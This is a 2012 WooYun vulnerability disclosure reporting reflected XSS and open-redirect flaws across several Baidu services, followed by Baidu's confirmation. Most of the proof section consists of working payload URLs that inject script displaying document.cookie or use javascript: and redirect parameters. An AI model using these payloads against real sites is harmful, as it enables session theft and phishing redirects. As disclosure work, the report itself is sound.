漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2012-015237
漏洞标题:百度反射xss/url跳转小礼包
相关厂商:百度
漏洞作者: 水滴
提交时间:2012-11-25 17:55
修复时间:2013-01-09 17:56
公开时间:2013-01-09 17:56
漏洞类型:xss跨站脚本攻击
危害等级:低
自评Rank:5
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2012-11-25: 细节已通知厂商并且等待厂商处理中
2012-11-26: 厂商已经确认,细节仅向厂商公开
2012-12-06: 细节向核心白帽子及相关领域专家公开
2012-12-16: 细节向普通白帽子公开
2012-12-26: 细节向实习白帽子公开
2013-01-09: 细节向公众公开
简要描述:
百度反射xss/url跳转小礼包
详细说明:
反射型xss 和 url跳转
漏洞证明:
一键分享页面:
http://s.share.baidu.com/mshare?click=1&url=http%3A%2F%2Fshare.baidu.com%2Fhtml%2Fact%2Fthanksgivingday%2F&uid=&to=mshare&type=text&relateUid=&pic=http%3A%2F%2Fshare.baidu.com%2Fhtml%2Fact%2Fthanksgivingday%2Fimg%2Fsingle%2Fthinkgiving_db4f20b.jpg%3f%27%22%3e%3chr%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e&title=%25e7%2599%25be%25e5%25ba%25a6%25e5%2588%2586%25e4%25ba%25ab&key=&sign=on&desc=&comment=&searchPic=0
收藏到百度相册:
http://up.xiangce.baidu.com/opencom/picture/fav/add?app_id=314406&url=http://imgsrc.baidu.com/forum/pic/item/46f1f736afc37931f05971b3ebc4b74543a9117c.jpg&descript=求大图&tags=百度贴吧,桌面吧&source_url=http://tieba.baidu.com/p/1803552143&callback_url=javascript:alert(document.cookie)//&charset=gbk
通讯录:
http://tongxunlu.baidu.com/rest/2.0/pim/contacts?method=add&app_id=20¶m={"list":[{"dn":"aaaa<hr><img src=x onerror=alert(document.cookie)>","luid":1,"lctime":1347955820586,"lmtime":1347955820586}]}
百度钱包:
https://wallet.baidu.com/order/?status=all&stime="><img src=x onerror=alert(document.domain)>&etime="><img src=x onerror=alert(document.cookie)>&type=q_om
注册成功的提示页面:
http://static.tieba.baidu.com/tb/static-common/html/reg/pass_reg_ok.html?jumb=http://www.wooyun.org&errno=0
http://static.tieba.baidu.com/tb/static-common/html/reg/pass_reg_ok.html?jumb=javascript:alert(document.cookie)&errno=0
需要等待三秒才会执行..... 在别的网站里加上iframe调用比较合适
百度分享查看数据分析页面:
http://share.baidu.com/analysis/urlshare?url=http://www.baidu.com/?%27%22%3E%3Chr%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
绑定帐号:
http://passport.baidu.com/phoenix/account/startlogin?type=2&u=http://www.wooyun.org
如果已经登录了相应平台的帐号,授权后最终会跳转到可控的返回链接
http://passport.baidu.com/phoenix/account/startlogin?type=2&u=javascript:alert(/test/)
贴图神器xss IE6 only :
http://tieba.baidu.com/photo/shenqi?title=&src=&pic[0]=javascript:alert(/ie6/)
绿钩302跳转:
http://m.baidu.com/share?action=preauth&arturl=http://www.qq.com
修复方案:
...
版权声明:转载请注明来源 水滴@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:12
确认时间:2012-11-26 16:16
厂商回复:
感谢对百度安全的关注,我们马上安排处理。
最新状态:
暂无